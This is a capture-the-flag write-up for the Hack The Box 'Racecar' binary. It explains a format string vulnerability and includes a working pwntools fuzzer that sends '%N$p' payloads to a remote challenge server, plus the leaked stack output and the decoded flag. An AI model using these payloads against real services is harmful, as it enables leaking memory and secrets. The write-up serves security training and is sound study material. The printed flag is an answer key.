Racecar
Last updated
Was this helpful?
Last updated
Was this helpful?
CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!this binary is vulnerable to format string vulnerability and since the flag is declared in the stack we can use the format string vuln to leak the flag out of the stack
┌──(root㉿kali)-[/home/kali/hackthebox/pwn]
└─# ./racecar
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
______ |xxx|
/|_||_\`.__ | F |
( _ _ _\ |xxx|
*** =`-(_)--(_)-' | I |
|xxx|
| N |
|xxx|
| I |
|xxx|
_-_- _/\______\__ | S |
_-_-__ / ,-. -|- ,-.`-. |xxx|
_-_- `( o )----( o )-' | H |
`-' `-' |xxx|
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
Insert your data:
Name: name
Nickname: something
[+] Welcome [name]!
[*] Your name is [name] but everybody calls you.. [something]!
[*] Current coins: [69]
1. Car info
2. Car selection
> 2
Select car:
1. 🚗
2. 🏎
> 2
Select race:
1. Highway battle
2. Circuit
> 1
[*] Waiting for the race to finish...
[+] You won the race!! You get 100 coins!
[+] Current coins: [169]
[!] Do you have anything to say to the press after your big victory?
> %p %p %p %p %p %p %p %p
The Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this:
0x583ec200 0x170 0x565bfdfa 0x42 (nil) 0x26 0x2 0x1we don't know the position of the variable that holds the flag value in the stack so we will fuzz the stack and keep leaking until we leak the flag, and to do that we will build a fuzzer script using python
from pwn import *
flag = ''
# Let's fuzz x values
for i in range(100):
try:
# Connect to server
io = remote('83.136.253.251', 42831)
io.sendlineafter(b'Name: ', b'anas')
io.sendlineafter(b'Nickname: ', b'something')
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'> ', b'1')
# Format the counter
# e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int)
io.sendlineafter(b'> ', '%{}$p'.format(i).encode())
# Receive the response
io.recvline()
io.recvline()
result = io.recv()
if not b'nil' in result:
print(str(i) + ': ' + str(result))
try:
# Decode, reverse endianess and print
decoded = unhex(result.strip().decode()[2:])
reversed_hex = decoded[::-1]
print(str(reversed_hex))
# Build up flag
flag += reversed_hex.decode()
except BaseException:
pass
except EOFError:
pass
# Print and close
info(flag)
io.close()let's run the fuzzer
┌──(kali㉿kali)-[~/hackthebox/pwn]
└─$ python exploit.py
...
[+] Opening connection to 83.136.253.251 on port 42831: Done
12: b'0x7b425448\n'
b'HTB{'
[+] Opening connection to 83.136.253.251 on port 42831: Done
13: b'0x5f796877\n'
b'why_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
14: b'0x5f643164\n'
b'd1d_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
15: b'0x34735f31\n'
b'1_s4'
[+] Opening connection to 83.136.253.251 on port 42831: Done
16: b'0x745f3376\n'
b'v3_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
17: b'0x665f3368\n'
b'h3_f'
[+] Opening connection to 83.136.253.251 on port 42831: Done
18: b'0x5f67346c\n'
b'l4g_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
19: b'0x745f6e30\n'
b'0n_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
20: b'0x355f3368\n'
b'h3_5'
[+] Opening connection to 83.136.253.251 on port 42831: Done
21: b'0x6b633474\n'
b't4ck'
[+] Opening connection to 83.136.253.251 on port 42831: Done
22: b'0x7d213f\n'
b'?!}'
...
[*] HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
